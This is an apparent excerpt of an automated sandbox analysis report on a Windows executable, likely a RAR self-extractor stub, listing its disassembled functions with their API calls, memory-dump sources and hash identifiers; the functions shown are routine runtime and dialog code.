                                                                                              • Instruction ID: 65e92018c1e99a4606e2dbe08b10389be60645109b395c878157e16ed04e6dcc
                                                                                              • Opcode Fuzzy Hash: 3c2f908b5ec4f75b6c61bfa7a870bd0776b119fbbfe2a353c2a03c4548d654d4
                                                                                              • Instruction Fuzzy Hash: 2CF0C2353012325F9B334E6C6C866A662FC9A027D9723043AEA1AD7100E710DC8156D1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00322799 Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 003227F1
                                                                                                • Part of subcall function 0031C619: GetVersionExW.KERNEL32(?), ref: 0031C63E
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00322815
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0032282F
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00322842
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00322852
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00322862
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 4fad3a32ac9a2312b73cb34d4a819e6bd666882465d7156e4a841e19f484fdc5
                                                                                              • Instruction ID: 29df15f24e2c86e059f15fc4ccce1d34f44f9eb55ec09007756031a8efef76e6
                                                                                              • Opcode Fuzzy Hash: 4fad3a32ac9a2312b73cb34d4a819e6bd666882465d7156e4a841e19f484fdc5
                                                                                              • Instruction Fuzzy Hash: B8313879108355ABC704DFA9D88499BB7ECBF98704F004A2EF995C3210E730E548CBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00333C8A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00333C81,00333A3C,00330BF4), ref: 00333C98
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00333CA6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00333CBF
                                                                                              • SetLastError.KERNEL32(00000000,00333C81,00333A3C,00330BF4), ref: 00333D11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 396d47163d5d1b3a56598c6b50979e3890bb3ed746d98807a567a02f9ff4668e
                                                                                              • Instruction ID: 9bb6666014228074b731a8940c2fdb078808db4f103bab7843a806e1e2e46024
                                                                                              • Opcode Fuzzy Hash: 396d47163d5d1b3a56598c6b50979e3890bb3ed746d98807a567a02f9ff4668e
                                                                                              • Instruction Fuzzy Hash: 8E01F7372183225EA71B27757CC5A6B2F5CEB05775F724239F6206A0F1EF166D105680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033A515 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00353070,00335982,00353070,?,?,00335281,00000050,?,00353070,00000200), ref: 0033A519
                                                                                              • _free.LIBCMT ref: 0033A54C
                                                                                              • _free.LIBCMT ref: 0033A574
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A581
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A58D
                                                                                              • _abort.LIBCMT ref: 0033A593
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: 65f893f4d10d1f2bf7ab604f46e845af6e9b817f84ce915f7f8c87f5b6d5823a
                                                                                              • Instruction ID: 0cc4337bff02b1dc404f70950f6f5ea0c93d51a58ba8eff3bd04472feae4b494
                                                                                              • Opcode Fuzzy Hash: 65f893f4d10d1f2bf7ab604f46e845af6e9b817f84ce915f7f8c87f5b6d5823a
                                                                                              • Instruction Fuzzy Hash: 1FF0C83A240E0067E21B33257CCBF6B166D9BD3762F250224FAD4AA1A2EF259D018556
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031D4D2 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 0031CD5C: _wcsrchr.LIBVCRUNTIME ref: 0031CD73
                                                                                              • _wcslen.LIBCMT ref: 0031D5A4
                                                                                              • _wcslen.LIBCMT ref: 0031D5EC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$_wcsrchr
                                                                                              • String ID: .exe$.rar$.sfx
                                                                                              • API String ID: 3513545583-31770016
                                                                                              • Opcode ID: fbf829b73502c7293f14ab9012ec33f70efc26fea142fa3e79e315ac0f8c24f6
                                                                                              • Instruction ID: 272f62a0a36bb0c16881aaad48de18fb5d53c3ddd61118ccaae6c46e6ecf386e
                                                                                              • Opcode Fuzzy Hash: fbf829b73502c7293f14ab9012ec33f70efc26fea142fa3e79e315ac0f8c24f6
                                                                                              • Instruction Fuzzy Hash: 79415A22500360A5C73BAF34D852AFB73B9EF5B748B12460EF8869F081E7619DC1D391
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031CF32 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0031CF56
                                                                                              • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0031B505,?,?,00000800,?,?,0031B4CA,?), ref: 0031CFF4
                                                                                              • _wcslen.LIBCMT ref: 0031D06A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$CurrentDirectory
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 3341907918-253988292
                                                                                              • Opcode ID: 887e50d4c07771daeac7f1776b13495207837634941fc114a9a35378b937965a
                                                                                              • Instruction ID: f6aede456e98b6367e56ae5c26670d169641a71df2934c5a1afe78dbbb84b7d6
                                                                                              • Opcode Fuzzy Hash: 887e50d4c07771daeac7f1776b13495207837634941fc114a9a35378b937965a
                                                                                              • Instruction Fuzzy Hash: C041D036440229BACF27AF60DC41EEA77A9AF4E350F114425FC54AB041E771EAD28BA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C8CD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadBitmapW.USER32(00000065), ref: 0032C8DD
                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0032C902
                                                                                              • DeleteObject.GDI32(00000000), ref: 0032C934
                                                                                              • DeleteObject.GDI32(00000000), ref: 0032C957
                                                                                                • Part of subcall function 0032B6D2: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0032C92D,00000066), ref: 0032B6E5
                                                                                                • Part of subcall function 0032B6D2: SizeofResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B6FC
                                                                                                • Part of subcall function 0032B6D2: LoadResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B713
                                                                                                • Part of subcall function 0032B6D2: LockResource.KERNEL32(00000000,?,?,?,0032C92D,00000066), ref: 0032B722
                                                                                                • Part of subcall function 0032B6D2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B73D
                                                                                                • Part of subcall function 0032B6D2: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0032C92D,00000066), ref: 0032B74E
                                                                                                • Part of subcall function 0032B6D2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0032B7B7
                                                                                                • Part of subcall function 0032B6D2: GlobalUnlock.KERNEL32(00000000), ref: 0032B7D6
                                                                                                • Part of subcall function 0032B6D2: GlobalFree.KERNEL32(00000000), ref: 0032B7DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
                                                                                              • String ID: ]
                                                                                              • API String ID: 1428510222-3352871620
                                                                                              • Opcode ID: 079a815c1cb1febe28096a68f135826b7c58d7a4e7ef8fe83751559991155e03
                                                                                              • Instruction ID: 83ca0d1f2116a96e1851fe88f84701c8414fd02dc0d62261f9bae59e59e6a646
                                                                                              • Opcode Fuzzy Hash: 079a815c1cb1febe28096a68f135826b7c58d7a4e7ef8fe83751559991155e03
                                                                                              • Instruction Fuzzy Hash: B201D632540B2667DB132764AC05A7FBA7DAF81B91F150114F944BB292DF618C4586E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032E750 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032E79B
                                                                                              • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0032E7B1
                                                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 0032E7C5
                                                                                              • SetDlgItemTextW.USER32(?,00000068), ref: 0032E7D4
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemText$DialogWindow
                                                                                              • String ID: RENAMEDLG
                                                                                              • API String ID: 445417207-3299779563
                                                                                              • Opcode ID: 587553d6548445ff7f1af7ffb6c02d74a78097ca6bab0b0030148e7cebd232ef
                                                                                              • Instruction ID: 1a35971cc16e991ea84e492b112ebc519112b09e5c20b1f04d86033da42f756b
                                                                                              • Opcode Fuzzy Hash: 587553d6548445ff7f1af7ffb6c02d74a78097ca6bab0b0030148e7cebd232ef
                                                                                              • Instruction Fuzzy Hash: 750124332813217AE6374FBCAC4AFA73B5DFB4A702F000424F305A64D0C7A268498B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00339235 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003391E6,00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002), ref: 00339255
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00339268
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,003391E6,00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002), ref: 0033928B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 18efee2383518a97f1c46218c3b167103efd0db2050dcf525e77361e820c4f9a
                                                                                              • Instruction ID: 149b8fea7aa198be681b4813537c138f5b4f95c452bf3fce3caf74e354f729f8
                                                                                              • Opcode Fuzzy Hash: 18efee2383518a97f1c46218c3b167103efd0db2050dcf525e77361e820c4f9a
                                                                                              • Instruction Fuzzy Hash: B5F04F34A04618BBDB169FA4DC49B9EBFF8EB45752F0101A9F905AA160CF71AE50CA90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003112F6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0031F608: _swprintf.LIBCMT ref: 0031F62E
                                                                                                • Part of subcall function 0031F608: _strlen.LIBCMT ref: 0031F64F
                                                                                                • Part of subcall function 0031F608: SetDlgItemTextW.USER32(?,00350274,?), ref: 0031F6AF
                                                                                                • Part of subcall function 0031F608: GetWindowRect.USER32(?,?), ref: 0031F6E9
                                                                                                • Part of subcall function 0031F608: GetClientRect.USER32(?,?), ref: 0031F6F5
                                                                                              • GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                              • SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                                                              • String ID: 0$p05$p05
                                                                                              • API String ID: 2622349952-3330538057
                                                                                              • Opcode ID: 497981a3c2365c14d15e58dee74a5dd519af8bda4d302e66443f4e2984be779b
                                                                                              • Instruction ID: 72807fac896e485023b9df8ac89817ef25eebc5478bbc3e298709859661a4e0a
                                                                                              • Opcode Fuzzy Hash: 497981a3c2365c14d15e58dee74a5dd519af8bda4d302e66443f4e2984be779b
                                                                                              • Instruction Fuzzy Hash: 10F04F38110748ABDF6F5F608C09BEA3B99BB09385F054924FE59558E5CBB4CAD4EA10
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00333D6A Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: AdjustPointer$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 2252061734-0
                                                                                              • Opcode ID: b4c5dc6e3e69cc72deda5e095e63965f30da631d5248ec8d32659b2a5f716c29
                                                                                              • Instruction ID: 4532040b05291d55fbdf500fb4f70355af500459a139377a43470e87bd4cfd31
                                                                                              • Opcode Fuzzy Hash: b4c5dc6e3e69cc72deda5e095e63965f30da631d5248ec8d32659b2a5f716c29
                                                                                              • Instruction Fuzzy Hash: 0651F4726002029FDB2B8F15D8C1BBA77A8EF44310F15852DEC419B2A0E775EE90CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033D0F0 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 0033D0F9
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033D11C
                                                                                                • Part of subcall function 0033A7FE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0033DBEC,00000000,?,003380B1,?,00000008,?,0033A871,?,?,?), ref: 0033A830
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033D142
                                                                                              • _free.LIBCMT ref: 0033D155
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033D164
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 336800556-0
                                                                                              • Opcode ID: a2c54a5d4389f7174ac393031d4f63639239365ef9d839e410cf81bb81491f96
                                                                                              • Instruction ID: e804ace21ba8de9711858384227534bf95561e676ad2f449f5de5f492b904ee9
                                                                                              • Opcode Fuzzy Hash: a2c54a5d4389f7174ac393031d4f63639239365ef9d839e410cf81bb81491f96
                                                                                              • Instruction Fuzzy Hash: 5501D476A016107F232316B67CC9D7B6A6EEEC7BA0B150129FD08CA300EE649C01C2B0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0033A599 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,?,0033A7F0,0033C348,?,0033A543,00000001,00000364,?,00335281,00000050,?,00353070,00000200), ref: 0033A59E
                                                                                              • _free.LIBCMT ref: 0033A5D3
                                                                                              • _free.LIBCMT ref: 0033A5FA
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A607
                                                                                              • SetLastError.KERNEL32(00000000,?,00353070,00000200), ref: 0033A610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free
                                                                                              • String ID:
                                                                                              • API String ID: 3170660625-0
                                                                                              • Opcode ID: 0c166b2af34674386aaed56ca48a1691efe27bf2ba972a3d346e6c8528ca64c2
                                                                                              • Instruction ID: bd7dd18d416832cae47fc7eba96af7cbd67f4fefd6a158a2e1106bb325dce976
                                                                                              • Opcode Fuzzy Hash: 0c166b2af34674386aaed56ca48a1691efe27bf2ba972a3d346e6c8528ca64c2
                                                                                              • Instruction Fuzzy Hash: F901493A244E0067931767246CC7E1B326EDBC2371F260024F9C5A6162EF248C015266
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032220D Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 003224EF: ResetEvent.KERNEL32(?), ref: 00322501
                                                                                                • Part of subcall function 003224EF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00322515
                                                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00322241
                                                                                              • CloseHandle.KERNEL32(?,?), ref: 0032225B
                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00322274
                                                                                              • CloseHandle.KERNEL32(?), ref: 00322280
                                                                                              • CloseHandle.KERNEL32(?), ref: 0032228C
                                                                                                • Part of subcall function 00322303: WaitForSingleObject.KERNEL32(?,000000FF,00322526,?), ref: 00322309
                                                                                                • Part of subcall function 00322303: GetLastError.KERNEL32(?), ref: 00322315
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
